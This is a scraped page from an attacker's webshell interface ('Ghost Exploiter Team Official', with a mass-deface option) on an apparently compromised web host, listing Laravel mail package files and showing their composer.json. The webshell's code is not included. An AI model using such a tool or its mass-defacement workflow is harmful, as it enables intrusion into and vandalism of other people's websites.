webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Mail
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Events
--
ren
Mailables
--
ren
Transport
--
ren
resources
--
ren
Attachment.php
4.915KB
edt
ren
LICENSE.md
1.05KB
edt
ren
MailManager.php
17.155KB
edt
ren
MailServiceProvider.php
1.724KB
edt
ren
Mailable.php
45.987KB
edt
ren
Mailer.php
18.124KB
edt
ren
Markdown.php
4.556KB
edt
ren
Message.php
9.862KB
edt
ren
PendingMail.php
3.464KB
edt
ren
SendQueuedMailable.php
3.597KB
edt
ren
SentMessage.php
1.973KB
edt
ren
TextMessage.php
1.385KB
edt
ren
composer.json
1.464KB
edt
ren
{ "name": "illuminate/mail", "description": "The Illuminate Mail package.", "license": "MIT", "homepage": "https://laravel.com", "support": { "issues": "https://github.com/laravel/framework/issues", "source": "https://github.com/laravel/framework" }, "authors": [ { "name": "Taylor Otwell", "email": "taylor@laravel.com" } ], "require": { "php": "^8.1", "illuminate/collections": "^10.0", "illuminate/container": "^10.0", "illuminate/contracts": "^10.0", "illuminate/macroable": "^10.0", "illuminate/support": "^10.0", "league/commonmark": "^2.2", "psr/log": "^1.0|^2.0|^3.0", "symfony/mailer": "^6.2", "tijsverkoyen/css-to-inline-styles": "^2.2.5" }, "autoload": { "psr-4": { "Illuminate\\Mail\\": "" } }, "extra": { "branch-alias": { "dev-master": "10.x-dev" } }, "suggest": { "aws/aws-sdk-php": "Required to use the SES mail driver (^3.235.5).", "symfony/http-client": "Required to use the Symfony API mail transports (^6.2).", "symfony/mailgun-mailer": "Required to enable support for the Mailgun mail transport (^6.2).", "symfony/postmark-mailer": "Required to enable support for the Postmark mail transport (^6.2)." }, "config": { "sort-packages": true }, "minimum-stability": "dev" }